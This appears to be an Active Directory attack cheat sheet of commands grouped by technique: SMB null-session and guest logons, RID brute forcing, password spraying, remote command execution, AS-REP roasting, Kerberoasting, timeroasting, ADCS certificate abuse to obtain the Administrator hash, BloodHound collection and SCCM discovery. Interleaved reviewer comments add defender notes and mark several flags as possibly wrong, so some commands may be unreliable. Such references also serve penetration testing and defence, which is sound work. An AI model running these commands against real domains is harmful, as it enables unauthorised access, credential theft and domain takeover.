Mindmap

SMB

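# SMB / FTP anonymous logon checks: null session, then the built-in Guest account.
# Defender note: both succeed only where anonymous/guest SMB access is still
# permitted on the DC; restricting it closes this whole section.
nxc smb <dc-ip> -u '' -p ''
nxc smb <dc-ip> -u 'Guest' -p ''

# RID cycling over the null session (enumerates SIDs/account names without credentials).
nxc smb <dc-ip> -u '' -p '' --rid-brute

# Enumerate domain accounts and shared folders.
# The original line `--users / --shares` was shorthand for two separate runs,
# not a single valid invocation; it is split here.
nxc smb <dc-ip> -u '' -p '' --users
nxc smb <dc-ip> -u '' -p '' --shares

# Authenticated remote command execution (wmiexec method).
# NOTE(review): sample credentials on this page are placeholders; real ones on
# argv are visible in process listings and shell history.
nxc smb <dc-ip> -u 'wiki' -p 'Password123!' --exec-method wmiexec -X 'whoami'

# Password spray: one password against a user list; --continue-on-success
# keeps going after the first hit.
# Defender note: sprays are bounded by the domain lockout threshold and show
# up as many failed logons from one source within a short window.
nxc smb <dc-ip> -u <user-list> -p 'Password123!' --continue-on-success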

Kerberos

# AS-REP Roasting: request AS-REPs for the users in <user-list> without
# credentials (only accounts with Kerberos pre-authentication disabled answer).
# Defender note: the mitigation is to clear "Do not require Kerberos
# preauthentication" on every account that has it set.
impacket-GetNPUsers <Domain>/'' -usersfile <user-list> -dc-ip <dc-ip> 

# AS-requested service tickets: with one known no-preauth account (<user>),
# request service tickets for the users in <user-list> (no password needed).
impacket-GetUserSPNs -no-preauth <user> -usersfile <user-list> -dc-host <dc-ip> <domain>/

# Timeroasting against the DC.
# NOTE(review): timeroast.py is not on this page — presumably the published
# SNTP-based timeroast script; confirm the source before relying on it.
python3 timeroast.py <dc-ip>

# Kerberoasting: authenticated request of service tickets for SPN-bearing
# accounts; -request fetches the tickets for offline cracking.
# Defender note: long random service-account passwords (or gMSAs) make the
# collected tickets impractical to crack.
impacket-GetUserSPNs <domain/user:pass> -request

ADCS

# Enumerate vulnerable certificate templates (-stdout prints the findings
# instead of writing output files).
# NOTE(review): the flag certipy documents is `-enabled`; `-enable` may only
# work through argparse prefix matching — confirm against the installed version.
certipy-ad find -u <user> -p <pass> -dc-ip <dc-ip> -vulnerable -stdout -enable

# Request a certificate from <ca> via <template>, supplying an alternative UPN.
# Defender note: the CA's request log records the requester and the SAN;
# removing "supply in request" or enforcing manager approval on the template
# blocks this.
certipy-ad req -u <user> -p <pass> -ca <ca> -target <dc-fqdn> -template <template> -dc-ip <dc-ip> -upn Administrator

# Dump the NT hash by authenticating with the issued PFX.
# NOTE(review): `auth-pfx` looks like a typo for certipy's `auth` subcommand
# with its `-pfx` option — confirm against the installed version.
certipy-ad auth-pfx administrator.pfx -domain <domain> -dc-ip <dc-ip>

BloodHound

# bloodhound-python collector: -c All gathers every collection method,
# --zip packs the output into one archive.
# NOTE(review): confirm the `-nc <dc-ip>` switch against the installed
# collector's help output; it is not obviously one of its documented options.
bloodhound-python -d <domain> -u <user> -p <pass> -gc <domain> -c All --zip -nc <dc-ip>

# SharpHound collector, run from a Windows host in the domain.
./sharphound.exe -c All -d <domain>

SCCM

# sccmhunter: locate SCCM infrastructure via LDAP (-debug for verbose output).
# NOTE(review): credentials passed on argv are visible in process listings.
python3 sccmhunter.py find -u <user> -p <pass> -d <domain> -dc-ip <dc-ip> -debug

# ldeep: query the DC over LDAP for SCCM-related objects.
ldeep ldap -u <user> -p <pass> -d <domain> -s ldap://<dc-ip> sccm
